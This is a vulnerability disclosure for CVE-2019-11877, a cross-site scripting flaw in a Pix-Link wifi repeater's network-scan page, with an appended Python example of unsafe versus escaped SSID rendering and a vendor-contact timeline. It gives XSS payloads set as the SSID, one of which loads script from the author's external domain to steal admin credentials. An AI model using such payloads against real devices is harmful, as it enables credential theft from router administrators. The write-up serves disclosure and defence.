[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater
I needed a wifi repeater for my house and bought a Pix-Link LV-WR09, since it was one of the cheapest. I thought, "What could go wrong with that?"
When I entered the repeater configuration page, I saw that the network listing function could be vulnerable to a Cross-Site Scripting attack through a wifi network with a malicious BSSID.
I used my smartphone to create a wifi network named
<script>alert('XSS')</script>
And did the test:
Now it’s time to make a real attack.
The SSID is limited to a maximum of 32 characters, so I registered a domain short enough to fit:
http://ilrg.xyz/
I changed the SSID on my smartphone to <script src=//ilrg.xyz></script> and put my script in the index.html:
Now I just need to go to the settings page of the repeater and scan for available networks.
It will run the XSS and send the data to a file on my server.
With this, we have a PoC!
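The root cause described above is that the scan listing writes each SSID into the admin page as raw HTML, so any markup the beacon carries is executed in the administrator's browser. The following is an added example of how that listing should be rendered; it is not the vendor's firmware code, and the row layout, the field names and the scan results are assumptions constructed for the demonstration. It shows the vulnerable rendering next to the hardened one, which HTML-escapes every attacker-controlled field and refuses SSIDs longer than the 32-byte limit the post mentions.

```python
import html

# Constructed scan results for the demonstration (not real device output).
# The second SSID carries the same markup the write-up used as a first test.
SCAN_RESULTS = [
    {"ssid": "HomeNetwork", "bssid": "00:11:22:33:44:55", "signal": -40},
    {"ssid": "<script>alert('XSS')</script>", "bssid": "66:77:88:99:aa:bb", "signal": -70},
]

MAX_SSID_BYTES = 32  # 802.11 SSID limit, the same bound the post relies on


def render_row_unsafe(net):
    """The pattern that makes the listing vulnerable: the raw SSID is
    interpolated straight into the HTML of the admin page."""
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        net["ssid"], net["bssid"], net["signal"]
    )


def render_row_safe(net):
    """Hardened rendering: every field that originates from the air is
    escaped before it reaches the page, and over-length SSIDs are rejected."""
    ssid = net["ssid"]
    if len(ssid.encode("utf-8")) > MAX_SSID_BYTES:
        # A legitimate beacon cannot carry more than 32 bytes of SSID,
        # so treat anything longer as malformed rather than rendering it.
        ssid = "<invalid SSID>"
    return "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
        html.escape(ssid, quote=True),          # escapes < > & " '
        html.escape(str(net["bssid"]), quote=True),
        int(net["signal"]),                     # forces a numeric value
    )


def render_table(nets, row_fn=render_row_safe):
    """Build the network table; the row renderer is selectable so both
    behaviours can be compared on the same input."""
    return "<table>" + "".join(row_fn(n) for n in nets) + "</table>"


def contains_live_markup(page):
    """Detection helper: true if a <script tag survived into the output."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("unsafe:", render_table(SCAN_RESULTS, render_row_unsafe))
    print("safe:  ", render_table(SCAN_RESULTS))
```

Run on the constructed scan results, the unsafe renderer emits the SSID's <script> tag verbatim, while the safe renderer emits &lt;script&gt;...&lt;/script&gt;, which the browser displays as text and never executes. Escaping at the point of output is the fix; filtering on the SSID itself is not enough, because the 32-character budget still leaves room for a loader that pulls a larger payload from elsewhere, exactly as the post shows.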
Sources that served as inspiration:
http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf
https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120
https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/
Timeline:
28/04/2019 — First email sent to the vendor (no answer)
06/05/2019 — Second email sent to the vendor (no answer)
15/05/2019 — Third email sent to the vendor (no answer)
27/05/2019 — Disclosure